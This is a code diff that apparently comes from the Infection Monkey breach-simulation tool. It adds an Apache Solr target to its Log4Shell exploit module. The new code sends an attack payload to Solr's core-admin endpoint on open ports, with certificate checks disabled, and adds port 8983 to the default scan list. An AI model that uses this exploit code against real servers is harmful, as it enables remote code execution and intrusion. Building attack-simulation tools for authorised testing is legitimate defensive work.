Agent, Island: Add Apache Solr support for Log4Shell exploit

monkey/infection_monkey/exploit/log4shell_utils/requests/__init__.py

@@ -1,3 +1,4 @@
 from .poc_docker import trigger_exploit as exploit_poc
+from .solr import trigger_exploit as exploit_solr
 
-exploits = [exploit_poc]
+exploits = [exploit_poc, exploit_solr]

monkey/infection_monkey/exploit/log4shell_utils/requests/solr.py

@@ -0,0 +1,25 @@
+from logging import getLogger
+from typing import List
+
+import requests
+
+from infection_monkey.model import VictimHost
+
+logger = getLogger(__name__)
+
+
+def trigger_exploit(payload: str, host: VictimHost, open_ports: List[int]):
+    urls = build_urls(open_ports, host)
+    payload = {"foo": payload}
+    for url in urls:
+        try:
+            resp = requests.post(url, data=payload, timeout=5, verify=False)  # noqa DUO123
+        except requests.ReadTimeout as e:
+            logger.debug(f"Log4shell request failed {e}")
+
+
+def build_urls(open_ports: List[int], host: VictimHost) -> List[str]:
+    urls = []
+    for port in open_ports:
+        urls.append(f"http://{host.ip_addr}:{port}/solr/admin/cores")
+    return urls

monkey/monkey_island/cc/services/config_schema/internal.py

@@ -129,7 +129,7 @@ INTERNAL = {
                             "type": "array",
                             "uniqueItems": True,
                             "items": {"type": "integer"},
-                            "default": [80, 8080, 443, 8008, 7001, 9200],
+                            "default": [80, 8080, 443, 8008, 7001, 9200, 8983],
                             "description": "List of ports the monkey will check if are being used "
                             "for HTTP",
                         },